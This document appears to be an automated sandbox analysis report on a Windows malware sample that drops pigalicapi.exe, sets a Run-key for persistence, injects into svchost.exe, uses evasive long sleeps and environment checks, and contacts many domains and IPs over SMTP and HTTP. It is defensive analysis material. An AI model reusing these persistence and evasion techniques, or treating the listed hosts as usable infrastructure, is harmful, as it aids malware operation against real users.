                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_00428358 push edx; ret 0_2_0042838B
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_00423123 push esi; retf 0006h0_2_00423124
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_00428358 push edx; ret 6_2_0042838B
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_00423123 push esi; retf 0006h6_2_00423124
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_04009D2D push ecx; ret 10_2_04009D40
                      Source: iJzpyjAehB.exeStatic PE information: section name: /4
                      Source: iJzpyjAehB.exeStatic PE information: section name: /19
                      Source: iJzpyjAehB.exeStatic PE information: section name: /35
                      Source: iJzpyjAehB.exeStatic PE information: section name: /51
                      Source: iJzpyjAehB.exeStatic PE information: section name: /63
                      Source: iJzpyjAehB.exeStatic PE information: section name: /77
                      Source: iJzpyjAehB.exeStatic PE information: section name: /89
                      Source: iJzpyjAehB.exeStatic PE information: section name: /102
                      Source: iJzpyjAehB.exeStatic PE information: section name: /113
                      Source: iJzpyjAehB.exeStatic PE information: section name: /124
                      Source: pigalicapi.exe.0.drStatic PE information: section name: /4
                      Source: pigalicapi.exe.0.drStatic PE information: section name: /19
                      Source: pigalicapi.exe.0.drStatic PE information: section name: /35
                      Source: pigalicapi.exe.0.drStatic PE information: section name: /51
                      Source: pigalicapi.exe.0.drStatic PE information: section name: /63
                      Source: pigalicapi.exe.0.drStatic PE information: section name: /77
                      Source: pigalicapi.exe.0.drStatic PE information: section name: /89
                      Source: pigalicapi.exe.0.drStatic PE information: section name: /102
                      Source: pigalicapi.exe.0.drStatic PE information: section name: /113
                      Source: pigalicapi.exe.0.drStatic PE information: section name: /124
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_10001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,0_2_10001030

                      Persistence and Installation Behavior

                      barindex
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.4000000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.10004088.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.10004088.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.2260000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.2261e88.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.2260000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.7e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.10004088.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.2380000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.4000000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.2261e88.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.7e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.10004088.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.10004088.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.2381e88.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.7e1e88.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.7e1e88.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.4000000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.2380000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.10004088.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.2381e88.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.608690490.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.607161240.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.567367147.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.607986528.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.567130920.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.571934007.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\svchost.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,0_2_04003B00
                      Source: C:\Users\user\pigalicapi.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,2_2_04003B00
                      Source: C:\Users\user\pigalicapi.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,6_2_04003B00
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exe TID: 5852Thread sleep time: -21600000s >= -30000sJump to behavior
                      Source: C:\Users\user\pigalicapi.exe TID: 6092Thread sleep time: -21600000s >= -30000sJump to behavior
                      Source: C:\Users\user\pigalicapi.exe TID: 1584Thread sleep time: -21600000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 1424Thread sleep count: 74 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4060Thread sleep count: 84 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5440Thread sleep time: -80000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4432Thread sleep count: 105 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 2184Thread sleep time: -50000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5696Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5696Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5376Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 2028Thread sleep count: 537 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5148Thread sleep count: 549 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5156Thread sleep count: 51 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5972Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6488Thread sleep count: 340 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6496Thread sleep count: 424 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 3468Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4648Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 820Thread sleep count: 53 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6236Thread sleep count: 40 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5108Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4984Thread sleep count: 33 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6260Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6272Thread sleep count: 46 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6408Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6560Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6424Thread sleep count: 33 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6876Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6916Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 9292Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 11840Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\pigalicapi.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_2-4417
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-5151
                      Source: C:\Users\user\pigalicapi.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04001CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_04001CA0
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 537
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 549
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 424
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-4853
                      Source: C:\Users\user\pigalicapi.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-4119
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-5132
                      Source: C:\Users\user\pigalicapi.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_2-4398
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: GetAdaptersInfo,0_2_04009F70
                      Source: C:\Users\user\pigalicapi.exeCode function: GetAdaptersInfo,2_2_04009F70
                      Source: C:\Users\user\pigalicapi.exeCode function: GetAdaptersInfo,6_2_04009F70
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04008F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,0_2_04008F80
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeAPI call chain: ExitProcess graph end nodegraph_0-4719
                      Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end nodegraph_2-3985
                      Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                      Source: iJzpyjAehB.exe, 00000000.00000003.264766570.0000000007579000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04001CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_04001CA0
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_10001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,0_2_10001030
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04001390 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,0_2_04001390
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04003090 mov eax, dword ptr fs:[00000030h]0_2_04003090
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_023709FC mov eax, dword ptr fs:[00000030h]0_2_023709FC
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_10001030 mov eax, dword ptr fs:[00000030h]0_2_10001030
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04003090 mov eax, dword ptr fs:[00000030h]2_2_04003090
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_10001030 mov eax, dword ptr fs:[00000030h]2_2_10001030
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04003090 mov eax, dword ptr fs:[00000030h]6_2_04003090
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_10001030 mov eax, dword ptr fs:[00000030h]6_2_10001030
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00401005 mov eax, dword ptr fs:[00000030h]10_2_00401005
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_04001A30 mov eax, dword ptr fs:[00000030h]10_2_04001A30
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_00401479 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,0_2_00401479
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_00401000 SetUnhandledExceptionFilter,__getmainargs,__p__fmode,__p__environ,_cexit,ExitProcess,_iob,_setmode,_setmode,_setmode,0_2_00401000
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04003B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,0_2_04003B00
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04003B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,2_2_04003B00
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_00401000 SetUnhandledExceptionFilter,__getmainargs,__p__fmode,__p__environ,_cexit,ExitProcess,_iob,_setmode,_setmode,_setmode,6_2_00401000
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04003B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,6_2_04003B00

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dayvo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.252.159.165 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: enguita.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.180.58.31 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avse.hu
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.130.204.160 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: notis.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.74.161.133 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.226.70.66 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 37.59.243.164 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kamptal.at
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.81.136.239 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.163.45.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.189.66.202 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.89.126 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.30.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.183.62 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.134.13.210 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.38.21 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vdoherty.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.159.3.117 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftmobile.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.13 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.68.180 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.111.4.75 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.123.195 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.19.218.80 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.102.136.180 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.148.35 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: semuk.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.50.140 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.132.175.106 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.164.117.233 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.107 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nblewis.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amba-tc.si
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25
